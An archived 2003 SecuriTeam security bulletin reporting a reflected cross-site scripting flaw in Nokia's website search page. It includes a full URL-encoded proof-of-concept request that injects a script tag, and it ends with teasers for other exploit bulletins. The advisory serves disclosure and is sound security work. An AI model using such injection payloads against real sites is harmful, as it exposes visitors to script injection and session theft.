[NEWS] XSS Vulnerability in NOKIA Official Website

From: support@securiteam.com
Date: 01/18/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 18 Jan 2003 10:42:18 +0200

    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      XSS Vulnerability in NOKIA Official Website

    SUMMARY

    A Cross Site Scripting vulnerability has been discovered in Nokia
    Official' site. The vulnerability would allow attackers to cause users to
    view 3rd-party malicious JavaScript or HTML code as if it were the
    legitimate content offered by Nokia, it also allows an attacker to cause a
    user to execute arbitrary code.

    DETAILS

    Example:

    <http://www.nokia.com/search/search.jsp?qt=%22%3E%3Cscript%3Ealert%28%27XSS+Nokia.com+--%3E+By+K-Otik%27%29%3C%2Fscript%3E%3CFound+By+K-Otik+TeaM%3D%22&col=wwwdb&col=forum&col=com&col=press&col=region&wsid=001&st=1&x=13&y=2.jsp?qt=%22%3E%3Cscript%3Ealert%28%27XSS+Nokia.com+--%3E+By+K-Otik%27%29%3C%2Fscript%3E%3CFound+By+K-Otik+TeaM%3D%22&col=wwwdb&col=forum&col=com&col=press&col=region&wsid=001&st=1&x=13&y=2

    Vendor status:
    Nokia has been contacted.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ReYn0@k-otik.com> Bekrar
    Chaouki (ReYn0).

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • [EXPL] Local Root Exploit for cifslogin on HP-UX
      ... execute arbitrary code, and gaining arbitrary privileges. ... char buffer; ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] AIM Filter (Vulnerability Filtering Assistant)
      ... AIM Filter allows users of AIM to protect themselves from incoming illegal ... (crash it, cause it to execute arbitrary code, etc). ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] Remote Heap Corruption Overflow vulnerability in WsMp3d (CHA)
      ... A remotely exploitable heap vulnerability allows ... attackers to cause the program to execute arbitrary code. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NEWS] Nokia OBEX DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A flaw in the OBEX implementation of Nokia 7610 and other models, ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] Security Vulnerability Found in S8Forum
      ... Beyond Security would like to welcome Tiscali World Online ... it to execute arbitrary code. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)